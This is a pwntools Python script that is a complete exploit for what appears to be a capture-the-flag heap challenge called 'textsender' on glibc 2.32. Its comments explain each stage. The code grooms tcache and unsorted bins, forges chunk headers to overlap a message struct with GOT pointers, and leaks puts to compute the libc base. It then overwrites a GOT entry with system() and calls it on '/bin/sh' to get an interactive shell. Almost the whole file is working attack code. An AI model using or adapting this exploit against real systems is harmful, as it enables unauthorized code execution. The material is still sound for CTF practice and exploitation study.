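from pwn import *

# Target endpoint and binaries.  NOTE(review): host/port, binary name and the
# libc build (2.32) are hard-coded; every libc offset used later is only valid
# if this libc-2.32.so is byte-identical to the one the remote service loads.
io = remote('chals.sekai.team', 4000)

context.binary = 'textsender'
elf = ELF('textsender', checksec=False)
libc = ELF('libc-2.32.so', checksec=False)


def ru(x):
    """Receive up to delimiter ``x`` and return the data before it (delimiter dropped)."""
    return io.recvuntil(x, drop=True)


def sla(a, b):
    """Wait for prompt ``a`` on the tube, then send ``b`` followed by a newline."""
    return io.sendlineafter(a, b)


def ia():
    """Hand the connection over to the user (interactive shell)."""
    return io.interactive()


def uu64(x):
    """Unpack a partial little-endian leak (1-8 bytes) as an unsigned 64-bit int.

    The NUL pad is a bytes literal so the call works whether ``recvuntil``
    hands back str (Python 2 pwntools) or bytes (Python 3 pwntools); a str
    pad raises TypeError on bytes input.
    """
    return u64(x.ljust(8, b'\x00'))


def libc_os(x):
    """Rebase libc offset ``x`` onto the global ``libc_base`` (set after the leak)."""
    return libc_base + x


def libc_sym(x):
    """Resolve libc symbol ``x`` to its runtime address via ``libc_base``."""
    return libc_os(libc.sym[x])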
def menu(choice):
    """Answer the main-menu prompt ``'> '`` with option ``choice`` (int or str)."""
    io.sendlineafter('> ', str(choice))
def set_sender(name):
    """Menu option 1: set the sender name to ``name``."""
    menu(1)
    io.sendlineafter("Sender's name: ", name)
def add_message(name, msg):
    """Menu option 2: create a draft addressed to ``name`` with body ``msg``."""
    menu(2)
    for prompt, answer in (('Receiver: ', name), ('Message: ', msg)):
        sla(prompt, answer)
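def edit_message(name, msg):
    """Menu option 3: select draft ``name`` and replace its text with ``msg``.

    After the name prompt the binary answers with one line.  If that line
    contains "Cannot" (presumably a not-found/refused draft) no new-message
    prompt follows, so we return without sending anything and keep the menu
    state in sync.  The marker is a bytes literal so the containment test
    works on both Python 2 (str) and Python 3 (bytes) pwntools; with a str
    marker Python 3 raises TypeError here.
    """
    menu(3)
    sla('Name: ', name)
    data = ru('\n')
    if b'Cannot' in data:
        return
    sla('New message: ', msg)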
def print_message():
    """Menu option 4: dump the current drafts (the output carries the leak)."""
    sla('> ', '4')
def send_message():
    """Menu option 5: send the queued drafts (presumably releasing their buffers)."""
    sla('> ', '5')
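def _add_drafts(n):
    """Create ``n`` drafts named "0".."n-1", each with a one-byte body."""
    for i in range(n):
        add_message(str(i), 'a')


# --- Stage 1: heap grooming -------------------------------------------------
# Two rounds of 8 drafts, each followed by send_message().  NOTE(review):
# send presumably frees the draft buffers; with 8 same-sized frees on glibc
# 2.32 the 7-entry tcache bin fills and the 8th chunk lands in a regular bin.
# Confirm against the binary before changing these counts.
_add_drafts(8)
set_sender('a')
send_message()
_add_drafts(8)
send_message()

# A 0x420-byte name exceeds the tcache size limit, so its buffer presumably
# goes to the unsorted bin when released, leaving a large region to carve up.
edit_message('a' * 0x420, 'a')
edit_message('a' * 0x100, 'a')

# --- Stage 2: forge a chunk header inside a name buffer ----------------------
_add_drafts(7)
# Offset 0xa8 of the 0x100-byte name carries a fake size field 0x201
# (0x200 | PREV_INUSE); the "Sender: " text that follows matches the prefix the
# binary uses for the sender name.  The exact overlap is layout-specific.
pld = flat({
    0xa8: 0x201,
    0xb0: 'Sender: ',
}, length=0x100)
edit_message(pld, 'a')
add_message('7', 'a')
send_message()

# --- Stage 3: overlap a draft struct with attacker-controlled pointers --------
_add_drafts(8)
# Fake 0x20 chunk (size 0x21) whose two qwords become the name and message
# pointers of the draft the binary prints as "(Draft 7)".  0x404028 / 0x404018
# are fixed non-PIE addresses inside `textsender`, presumably GOT slots (the
# first one must hold puts, given how the leak is parsed below).
pld = flat({
    0x138: 0x21,
    0x140: 0x0000000000404028,
    0x148: 0x0000000000404018,
})
edit_message('6', pld)

# --- Stage 4: leak libc ------------------------------------------------------
print_message()
ru('(Draft 7) ')
puts_addr = uu64(ru(':'))  # bytes between "(Draft 7) " and ':' = *(0x404028)
libc_base = puts_addr - libc.sym['puts']
# A correct leak always gives a page-aligned base.  Anything else means the
# heap layout or the libc file is wrong; stop before writing garbage into the GOT.
if libc_base & 0xfff:
    raise ValueError('bad libc leak: puts=%#x base=%#x' % (puts_addr, libc_base))
log.info('puts @ %#x, libc base @ %#x' % (puts_addr, libc_base))
sys_addr = libc_sym('system')

# --- Stage 5: GOT overwrite --------------------------------------------------
# The corrupted draft is found by its name, i.e. the raw puts address bytes;
# editing it writes system() through the message pointer into 0x404018.  The
# following edit with name "/bin/sh" presumably reaches the hijacked slot with
# that string as its first argument, yielding a shell.
edit_message(flat(puts_addr), flat(sys_addr))
edit_message('/bin/sh\x00', 'a')
ia()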